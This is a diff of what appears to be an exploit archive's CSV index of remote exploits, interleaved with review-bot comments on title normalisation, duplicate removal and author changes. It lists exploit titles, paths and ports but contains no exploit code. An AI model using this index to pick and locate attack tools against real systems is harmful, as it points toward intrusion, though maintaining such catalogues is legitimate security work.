 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0
-4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)",2007-09-03,"Patrick Webster",windows,remote,0
+4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0
 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0
 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow",2007-09-05,void,windows,remote,0
 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,windows,remote,0
@@ -9813,7 +9807,7 @@ id,file,description,date,author,platform,type,port
 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0
 5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515
 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
-5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
+5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0
 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0
 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote,0
@@ -9895,7 +9889,7 @@ id,file,description,date,author,platform,type,port
 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
 6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80
-6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0
+6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0
 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0
 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0
 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0
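Review bot: Row 6121 two lines below the retitled row 6116 still reads `(html parser) Remote Buffer Overflow (C)`, so the two IntelliTamper entries for the same bug now use different wording for the same component and no longer sort or search together. Since the commit is normalising this title, the sibling row should get the same treatment in the same change: `6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0`. Row 6118's `(server header)` is the same parenthesised style, though whether the rest of the file still uses it cannot be judged from this hunk.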
@@ -9981,7 +9975,7 @@ id,file,description,date,author,platform,type,port
 7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,windows,remote,0
 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - (URI handler) Remote Command Execution",2008-11-21,Nine:Situations:Group,windows,remote,0
 7183,platforms/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0
-7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0
+7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0
 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - Site Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0
 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - Cross-Site Request Forgery (Change Administrative Password)",2008-12-08,"Michael Brooks",windows,remote,0
 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",hardware,remote,0
@@ -10047,7 +10041,7 @@ id,file,description,date,author,platform,type,port
 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0
 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0
 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
-8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0
+8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)",2009-02-20,webDEViL,windows,remote,0
 8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0
 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0
 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0
@@ -10122,7 +10116,7 @@ id,file,description,date,author,platform,type,port
 8732,platforms/windows/remote/8732.py,"httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21
 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow",2009-05-19,rgod,windows,remote,0
 8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield 1.1.0.62 - Cross-Site Scripting / Code Execution",2009-05-19,inking,windows,remote,0
-8753,platforms/osx/remote/8753.txt,"Apple Mac OSX - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0
+8753,platforms/osx/remote/8753.txt,"Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)",2009-05-20,"Landon Fuller",osx,remote,0
 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
 8757,platforms/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote,0
 8758,platforms/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote,0
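Review bot: Row 8753 still reads `Remote Deserialization Remote (PoC)` after the edit, so the hunk relocates the `(PoC)` tag but leaves the doubled `Remote` in the title. Since the description is being rewritten anyway, `"Apple Mac OSX - Java Applet Remote Deserialization (PoC) (2)"` is the cleaner form. The `(2)` implies a `(1)` row outside this hunk, which I cannot confirm from here.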
@@ -10151,14 +10145,13 @@ id,file,description,date,author,platform,type,port
 9039,platforms/multiple/remote/9039.txt,"cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
 9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0
 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0
-9093,platforms/windows/remote/9093.txt,"Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0
+9093,platforms/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0
 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - JSP Source Viewing",2009-07-09,kingcope,windows,remote,0
 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote,0
 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0
 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0
 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0
 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0
-9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,remote,0
 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
 9181,platforms/windows/remote/9181.py,"Mozilla 
Firefox 3.5 - (Font tags) Remote Heap Spray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0
 9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
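Review bot: Row 9139 (`JetAudio 7.5.3 COWON Media Center - '.wav' Crash`, filed as `remote`) is dropped from the index, and nothing in the hunk shows whether `platforms/windows/remote/9139.pl` is deleted too or re-filed under `dos`, which is what a crash-only PoC reads like. If the file stays in the tree it becomes an orphan that index-driven tooling cannot find; if it is being reclassified, the replacement row belongs in the same commit so the index never has a gap. The hunk ends at 9209 here, so any re-added row would be outside this view.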
@@ -10229,27 +10222,27 @@ id,file,description,date,author,platform,type,port
 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
 9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25
 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783
-9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit) (1)",2002-02-01,"H D Moore",multiple,remote,3632
+9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632
 9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23
 9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23
 9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111
 9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 LPD - Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515
 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112
 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139
-9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0
-9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0
+9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - 
Content-Type Overflow (Metasploit)",2009-10-28,Metasploit,osx,remote,0
+9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,Metasploit,osx,remote,0
 9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21
 9929,platforms/osx/remote/9929.rb,"Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25
 9930,platforms/osx/remote/9930.rb,"Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0
 9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548
 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0
-9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)",2009-07-10,kf,multiple,remote,0
+9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0
 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690
 9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0
 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0
 9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123
-9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (1)",2004-10-21,patrick,multiple,remote,0
+9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit)",2004-10-21,patrick,multiple,remote,0
 9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",multiple,remote,5555
 9943,platforms/multiple/remote/9943.rb,"Apple QuickTime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote,0
 9944,platforms/multiple/remote/9944.rb,"Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)",2008-10-23,egypt,multiple,remote,0
@@ -10263,7 +10256,7 @@ id,file,description,date,author,platform,type,port
 9952,platforms/linux/remote/9952.rb,"PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723
 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306
 9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
-9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,remote,0
+9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,remote,0
 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0
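Review bot: Rows 9925 and 9927 change their author field from `anonymous` to `Metasploit`, which is a provenance change rather than the title clean-up the rest of this hunk performs, and nothing in the diff shows where the new attribution comes from. The other Metasploit-module rows in the same hunk (9913, 9917, 9921, 9924, 9934, 9941) keep the individual module author, so `Metasploit` as an author value is inconsistent with them unless the module metadata really lists nobody. If the intent is to mark the importing project, that is already carried by the `(Metasploit)` suffix in the description; otherwise keep `anonymous` so the index does not assert an authorship it cannot back. The second hunk on this line (9957) is a tag reorder only.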
@@ -10288,9 +10281,9 @@ id,file,description,date,author,platform,type,port
 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947
 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80
 10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow Exploit (Metasploit)",2004-07-18,onetwo,linux,remote,7787
-10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (1)",2001-09-01,"H D Moore",irix,remote,515
+10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",irix,remote,515
 10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",hp-ux,remote,515
-10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (1)",2008-01-08,MC,bsd,remote,49
+10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49
 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote,0
 10037,platforms/cgi/remote/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,remote,0
 10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80
@@ -10521,9 +10514,9 @@ id,file,description,date,author,platform,type,port
 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0
 15056,platforms/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0
 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0
-15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)",2010-09-21,Trancer,windows,remote,0
+15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
-15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2)",2010-10-01,Trancer,windows,remote,0
+15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)",2010-10-01,Trancer,windows,remote,0
 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0
 15213,platforms/asp/remote/15213.pl,"Microsoft ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0
 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
@@ -10602,7 +10595,7 @@ id,file,description,date,author,platform,type,port
 16056,platforms/windows/remote/16056.txt,"Oracle - Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0
 16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download",2011-01-29,"Zer0 Thunder",windows,remote,0
 16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - (http_response) Remote Buffer Overflow",2011-01-30,sup3r,windows,remote,0
-16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0
+16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",hardware,remote,0
 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - (PASV) Buffer Overflow Exploit",2011-02-03,modpr0be,windows,remote,0
 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0
 16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,windows,remote,0
@@ -10631,9 +10624,7 @@ id,file,description,date,author,platform,type,port
 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0
 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
-16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)",2010-11-11,Metasploit,multiple,remote,0
 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0
-16290,platforms/multiple/remote/16290.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (2)",2010-10-09,Metasploit,multiple,remote,0
 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
 16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote,0
 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization Exploit (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
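Review bot: Rows 16287 and 16290 are removed as the `(2)` twins of 9934 and 9941, yet both deleted rows are the later-dated imports (2010-11-11 and 2010-10-09) while the kept rows are dated 2009-07-10 and 2004-10-21. If the two `.rb` files differ, as a re-import after upstream module updates would, the index now points only at the older copy; and if `platforms/multiple/remote/16287.rb` and `16290.rb` are not deleted in the same commit they stay in the tree unindexed. Before merging this de-duplication, confirm the pairs are byte-identical or that the surviving row is the one whose file you want people to run.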
@@ -10662,7 +10653,7 @@ id,file,description,date,author,platform,type,port
 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
 16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0
 16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
-16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2)",2010-04-28,Metasploit,linux,remote,0
+16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,linux,remote,0
 16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0
 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0
 16324,platforms/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,multiple,remote,0
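Review bot: Row 16321 is renumbered from `(2)` to `(1)`, but the only other nttrans Samba row in this diff, 9936 `Samba 2.2.x - nttrans Overflow (Metasploit)`, carries no number at all, so the change leaves a `(1)` with no visible `(2)`. The convention elsewhere in this commit is to drop the suffix entirely once the twin goes (9915, 9934, 9941, 10033, 10035); either do the same here, `"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)"`, or number 9936 as `(1)` and keep 16321 as `(2)`. A `(2)` for 16321 may exist outside this view, in which case this is moot.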
@@ -10726,8 +10717,6 @@ id,file,description,date,author,platform,type,port
 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
-16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)",2010-07-03,Metasploit,hardware,remote,0
 16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@@ -10757,7 +10746,7 @@ id,file,description,date,author,platform,type,port
 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0
 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0
 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow (Metasploit)",2010-11-04,Metasploit,windows,remote,0
-16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)",2010-10-05,Metasploit,windows,remote,0
+16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16419,platforms/windows/remote/16419.rb,"Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
@@ -10817,7 +10806,6 @@ id,file,description,date,author,platform,type,port
 16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0
 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16476,platforms/windows/remote/16476.rb,"Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16477,platforms/windows/remote/16477.rb,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2)",2010-06-22,Metasploit,windows,remote,0
